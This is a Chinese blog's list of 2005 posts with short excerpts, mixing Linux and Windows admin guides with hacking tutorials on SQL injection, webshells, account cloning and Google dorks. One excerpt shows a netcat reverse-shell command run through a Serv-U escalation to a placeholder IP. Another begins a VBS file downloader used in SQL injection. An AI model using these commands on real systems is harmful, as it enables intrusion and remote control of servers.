- 博客(25)
- 收藏
- 关注
原创 Linux Shell
本文的内容来源于 MUO 的 Basics 部分,其原始英文版可以从这里获得http://www.mandrakeuser.org/docs/。中文版来自吴晓光的CMUO http://dummy.linux.net.cn/~xgwu/cmuo/。MUO 是 Mandrake Linux(http://www.mandrakelinux.com/)为用户提供的入门手册,其内容实用并且实时更新,非常
2005-02-27 06:10:00 797
原创 Linux常用命令集
名称:cal 使用权限:所有使用者 使用方式:cal [-mjy] [month [year]] 说明: 显示日历。若只有一个参数,则代表年份(1-9999),显示该年的年历。年份必须全部写出:``cal 89/ 将不会是显示 1989 年的年历。使用两个参数,则表示月份及年份。若没有参数则显示这个月的月历。 1752 年 9 月第 3 日起改用西洋新历,因这时大部份的国家都采用新历,有 10 天
2005-02-27 06:00:00 782
原创 Linux基本命令
Linux系统管理命令 wall命令 功能:这个命令的功能是对全部已登录的用户发送信息,用户可以先把要发送的信息写好存入一个文件中,然后输入: # wall 这样就能对所有的用户发送信息了。 在上面的例子中符号“ # wall ‘Thank you!’ Broadcast message from root (tty1) Fri Nov 26 14:15:07 1999
2005-02-27 05:57:00 1156
原创 操作系统简述
LinuxAid 工程师 fjxufeng一、计算机软件与操作系统 功能强大的计算机自从走进了人类的生活就发挥着越来越重要的作用,随着时代的发展,计算机已与人们的日常生活息息相关。不能不说计算机软件日新月异的发展在此起着关键作用。可以这么说,离开了软件,计算机就成了废铜烂铁。计算机机软件大致可以分为两类:系统软件和应用软件。系统软件用于管理计算机资源,并为应用软件提供一个统一的平台。应用软
2005-02-27 04:54:00 1306
原创 如何使用IPSec 阻止特定网络协议和端口
来源:http://support.microsoft.com/概要Internet 协议安全 (IPSec) 筛选规则可用于帮助保护基于 Windows 2000 的计算机免遭病毒及蠕虫等威胁带来的、基于网络的攻击。本文介绍如何为入站和出站网络通信筛选特定的协议和端口组合。本文还包括用于确定当前是否为基于 Windows 2000 的计算机指定了 IPSec 策略的步骤、用于创
2005-02-27 03:52:00 1531
原创 哇!有黑客!!!(下)
作者:elly 来源:安全焦点论坛注意看前面打了*号的那些文件,说它们不是后门之类入侵者留下的文件我才不信。先随便打开一个最近修改过的(就在不久前)Svclog看看: 代码 ============================================================C:/WINNT/system32>type Svclog.logPerf
2005-02-27 03:50:00 2349
原创 哇!有黑客!!!(上)
作者:elly 来源:安全焦点论坛异象:昨夜西风凋碧树序幕:話説那日elly與衆人閒談完"黑客趨勢(趣事)"之後,獨自下樓喝茶去了。 鳳簫聲動,玉壺光轉,正恍惚閒,忽聞手機鈴聲。原是尋到一服務器,正在閒置,可為所用。於是登錄上去,稍做配置...PCAnywhere正在登录。方世玉的老妈的师兄经常说,安全第一,安全第一。上去之后,当然是先看看服务器的服务配置。运行"Services.msc"
2005-02-27 03:48:00 1314
原创 SQL注入法攻击一日通
出处:教主的BLOG此文章是对网上大量同类文章的分析与总结,并结合自己实施过程中的体会综合而成,其中有不少直接引用,没有注意出处,请原作者见谅)随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根 据程序返回
2005-02-27 02:20:00 1070
原创 SQL注射总结(一)
作者:岁月联盟 猪猪Sql注射总结(早源于or1=1) 最重要的表名:select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses最重要的一些用户名(默认sql数据库中存在着的)pu
2005-02-27 02:15:00 739
原创 2004·网络安全圈
创建时间:2005-01-10root (webmaster_at_xfocus.org)2004·网络安全圈网络安全焦点走进2005,我们回头看看,一年来网络安全圈内的风风雨雨,哪些我们只是听了个响?哪些是我们真切地触摸和感受的?圈里圈外,安全已经完全融入我们的生活……一、网络安全圈·趋势1.1 更多网络犯罪直接以经济利益为目的最吸引国人眼球的应该是腾讯,2004年两次QQ大规模无法使用,尤其是
2005-02-24 01:14:00 1050
原创 Windows下权限设置详解
创建时间:2005-02-15mrcool (mrcoolfuyu@tom.com)随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。难道我们真的无能为力了吗?其实,只要你弄明白了NTFS系统下的权限设置问题,我们可以对crackers们说:NO!
2005-02-24 00:38:00 653
原创 google hacking的实现以及应用
google hacking的实现以及应用(上)本文作者:sniper文章出于:www.4ngel.net日 期 : 05/01/26修改/发布: 05/02/21本文仅做于技术讨论于研究,请勿用做其他用途.PS:庆祝一下暂时摆脱应试教育的魔爪,向那些打着素质教育暗地里搞应试教育的学校竖起中指!前言 google hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关
2005-02-24 00:31:00 835
原创 Widnwos 2000 命令集合
accwiz.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导 acsetups.exe > ACS setup DCOM server executable actmovie.exe > Direct Show setup tool
2005-02-23 05:03:00 504
原创 克隆帐户终结篇修正版
来源:岁月联盟 猪猪几句废话:黑基发了我的克隆帐户之终结篇后,很多朋友对我文章提出了宝贵意见.由于原文是自己无聊时随便写的,很多地方不够严谨.于是我重新整理了此文,补充了一些资料,修改了不够严谨的地方, 有问题欢迎来我blog上探讨.序:相信大家都用过克隆帐户吧。无论是用工具还是用手工,克隆帐户无疑是隐藏帐户的最好选择。但是看见网上的文章都讲的特别麻烦。这样那样的。其实克隆帐户很简单。就
2005-02-22 20:29:00 905
原创 sql injection终极利用方法
————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限原创:许文强(xwq),QQ:57133683声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作。考虑再三,偶还是决定发出来。此招手段歹毒,利用范围广泛,可以说是只要是有sql
2005-02-21 00:29:00 622
原创 Sql注射中参数多次调用Echo解决办法
来源:情感网络 作者:xiaolu 我是在黑哥Blog看到的他写的,先引用黑哥的:Quote: 文/superhei 解决办法: 1.iget.vbs一次写入 在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写 Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments
2005-02-20 20:51:00 836
原创 通过webshell获得admin全攻略
作者:稻草人 QQ:16285939话说到花了九牛二虎的力气获得了一个webshell,当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~嘻嘻~~好跟我来,看看有什么可以利用的来提升权限****************************************************************************第一如果服务器上有装了pc
2005-02-20 20:46:00 1302
原创 nc的说明及使用
netcat被誉为网络安全界的‘瑞士军刀,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具, 能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几 乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个
2005-02-20 20:44:00 871
原创 解除TCP/IP限制的小技巧
作者:河马史诗 http://www.wrsky.com1.用NC反弹得到一个shell本机监听 NC -l -p 32WEBSHELL运行:x:/xxx/serv-u.exe "x:/xxx/nc.exe -e cmd.exe *.*.*.* port"得到一个shell2.CMD下导出注册表文件C:/>regedit -e x:/xxx/1.reg HKEY_LOCA
2005-02-20 20:42:00 863
原创 从上传webshell突破TCP/IP筛选到3389登陆
作者:lvhuana 来自:http://www.wrsky.com/日期:2004.12.11LvHuaNa一:得到webshell今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~突然发现一个聊天室特别的火暴,人数已
2005-02-20 20:41:00 881
原创 信息安全的隐患-GoogleHacking原理和防范
作者:zhaohuan@phack.org 来源:www.phack.org技术天地:GoogleHacking是利用Google的搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,最近这种以前由黑客手动进行操作的攻击手段可以通过一种新的蠕虫病毒来自动完成。为了引起大家对GoogleHacking的关注与重视,我们编发了这篇文章希望大家通过对Hack的攻击手段的了解,更好的保护自己的信息
2005-02-20 20:39:00 721
原创 常用的google关键字
foo1 foo2 (也就是关联,比如搜索xx公司 xx美女)operator:foofiletype:123 类型site:foo.com 相对直接看网站更有意思,可以得到许多意外的信息intext:foo intitle: fooltitle 标题哦allinurl:foo 搜索xx网站的所有相关连接。(踩点必备)links:foo 不要说就知道是它的相关链接
2005-02-20 20:38:00 922
原创 Google attack的利用
以后给出的形式是这样的,数字的后面跟的是要再google搜索的内容,后面跟着介绍和漏洞如何利用,由于本人时间有限制,所以就不翻译了,如果大家有兴趣的话自己翻译翻译吧.. 1.intitle:Login intext:"RT is ? Copyright" RT is an enterprise-grade ticketing system which enables a group o
2005-02-20 20:33:00 1663
原创 Google搜索从入门到精通v4.0
donquix 2002.81,前言2,摘要3,如何使用本文4,Google简介5,搜索入门6,初阶搜索 6.1,搜索结果要求包含两个及两个以上关键字 6.2,搜索结果要求不包含某些特定信息 6.3,搜索结果至少包含多个关键字中的任意一个7,杂项语法 7.1,通配符问题 7.2,关键字的字母大小写 7.3,搜索整个短语或者句子 7.4,搜索引擎忽略的字符以及强制搜索8,进阶搜索
2005-02-20 20:29:00 1140
原创 希望OL蝙蝠猪进化幸运猪的材料
马夫之扙、兔耳、狼皮、兔子毛球、鸡头、鸡上衣、鸡下裤、鸡爪、幸运草 森巴鸡之棍狼皮 马夫仗 兔耳朵 幸运卡 幸运草 鸡头 鸡腿裤 鸡上衣 鸡脚 兔子毛球
2005-02-15 21:15:00 1972
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人